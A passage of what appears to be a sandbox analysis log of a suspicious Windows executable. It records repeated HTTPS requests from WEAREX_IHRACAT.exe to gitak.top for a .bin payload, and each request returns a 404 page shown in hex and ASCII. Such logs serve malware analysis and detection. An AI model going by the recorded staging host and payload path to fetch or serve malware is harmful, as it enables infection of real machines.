                        2024-08-29 10:43:59 UTC1369INData Raw: 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a
                        Data Ascii: ;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:43:59 UTC913INData Raw: 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36
                        Data Ascii: 53 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6
                        2024-08-29 10:43:59 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                        Data Ascii: 1
                        2024-08-29 10:43:59 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        22192.168.11.2049798172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:44:09 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:44:10 UTC683INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:44:10 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 43
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EAyowupOWb5VXJ8gC4tntqPW5lHx8Wi31AqO8BiSuyacK%2BvW%2Bj8bdTSJccpv2AWsWdcPSFfIJC7JQrZwlmmGQw%2FXHYGg793%2F%2BJA0Oo8Nv7kyTTDfZi4IsfhJB%2F4%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf1ba687f1ffa-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:44:10 UTC686INData Raw: 62 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b95<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:44:10 UTC1369INData Raw: 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65
                        Data Ascii: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fade
                        2024-08-29 10:44:10 UTC917INData Raw: 2d 32 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68
                        Data Ascii: -2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h
                        2024-08-29 10:44:10 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                        Data Ascii: 1
                        2024-08-29 10:44:10 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        23192.168.11.2049799172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:44:20 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:44:20 UTC671INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:44:20 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 53
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NUQZXjbzj6ju5s79yPBAjZRr5ZbQySffRYXyCiog5C98MrYxjtX4dfqOvzHoEREzjEpqkWEcgtlnPMoUI77jkK34azHbAEx6NuWJoGWLZ0hVfIDXRrbRWywH9Fw%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf1fc3cdb8292-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:44:20 UTC698INData Raw: 62 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b95<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:44:20 UTC1369INData Raw: 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09 09 7d 0a 0a 09 09
                        Data Ascii: rgin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}
                        2024-08-29 10:44:20 UTC905INData Raw: 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31
                        Data Ascii: 5 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 1
                        2024-08-29 10:44:20 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                        Data Ascii: 1
                        2024-08-29 10:44:20 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        24192.168.11.2049800172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:44:30 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:44:31 UTC685INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:44:31 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 64
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jz7VFTiPKQF%2BrRLpb7vN69gK1%2BcUzeYu3BFQsHzO%2FmQB7Hoyaz7PP2PEJ91Iqz4OhWro%2BvS41XUpNsShp%2FwWXGND%2BNVq9DVAV5IhPeLjK9dkC%2FnuyGJawWmzKiU%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf23dfbae9c19-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:44:31 UTC684INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:44:31 UTC1369INData Raw: 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61
                        Data Ascii: : 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fa
                        2024-08-29 10:44:31 UTC920INData Raw: 38 36 2d 32 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31
                        Data Ascii: 86-2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 1
                        2024-08-29 10:44:31 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        25192.168.11.2049801172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:44:41 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:44:41 UTC681INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:44:41 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 74
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dSvQgm36B3CQEVixDq3DLwJqqF5XXqvULb76%2FrqY6JwvfSAYG14bICP2RkC3%2BlivDeQ11NRp0ElYQUdvNinDT9QqQ0DxTADa9IU3zT%2B7VYeAVDpivDoFpGi%2Fe%2BU%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf27f88a9c942-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:44:41 UTC688INData Raw: 62 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b95<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:44:41 UTC1369INData Raw: 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e
                        Data Ascii: px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn
                        2024-08-29 10:44:41 UTC915INData Raw: 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36
                        Data Ascii: .353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56
                        2024-08-29 10:44:41 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                        Data Ascii: 1
                        2024-08-29 10:44:41 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        26192.168.11.2049802172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:44:51 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:44:52 UTC683INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:44:52 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 85
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uvGrHFVh6PWFBvVSHPcReQAvG0Omr3d9apds8VsHZOTN8ioHKp0%2BhLP54nunsGj%2B29ujAyCl%2BpO8%2B20tzttoyvcV28n1%2BxKZ%2FhluUogbCGQ1Xa1zUUIn0U1DaPU%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf2c13d4281db-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:44:52 UTC686INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
